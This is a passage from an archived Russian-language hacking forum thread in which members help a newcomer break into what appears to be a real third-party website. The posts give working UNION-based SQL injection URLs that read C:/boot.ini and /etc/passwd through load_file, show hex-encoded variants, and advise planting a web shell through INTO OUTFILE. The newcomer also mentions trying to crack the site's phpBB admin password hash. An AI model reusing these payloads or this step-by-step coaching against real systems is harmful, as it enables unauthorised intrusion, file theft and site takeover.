ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Помогите залить шелл
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 27.12.2007, 12:04
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
попробуй так
 

  #12  
Старый 28.12.2007, 00:02
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию
delay(0) Thanks . )
Токо вот как ты получил 0x70687062625f7573657273 ?
 

  #13  
Старый 28.12.2007, 15:11
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию
Цитата:
Токо вот как ты получил 0x70687062625f7573657273 ?
Перевел название таблицы в hex.
 

  #14  
Старый 28.12.2007, 16:28
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию
Если есть привилегии file_priv, то мона залить шелл скулем через INTO OUTFILE. А коль есть ПхпББ, то через него конечно удобнее. Как? А вот так:
https://forum.antichat.ru/showpost.php?p=198446&postcount=3
 

  #15  
Старый 28.12.2007, 19:40
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию
Цитата:
Сообщение от iddqd  
Если есть привилегии file_priv, то мона залить шелл скулем через INTO OUTFILE. А коль есть ПхпББ, то через него конечно удобнее. [/U]
А можно немного поподробней об file_priv ...???

А то немогу расхешировать пароль Админа на phpBB....
 

  #16  
Старый 28.12.2007, 20:15
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию
короче если прокатит http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
либо
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

То file_priv есть, иначе его нет
 

  #17  
Старый 28.12.2007, 20:21
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
Сообщение от Macro  
короче если прокатит http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
либо
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

То file_priv есть, иначе его нет
тогда уж http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file(0x433A2F626F6F742E6 96E69),4,5,6/*

так надежней, к тому же как я понял серв виндовый:
Цитата:
Получил версию : 5.0.21-community-nt
__________________
Карфаген должен быть разрушен...
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ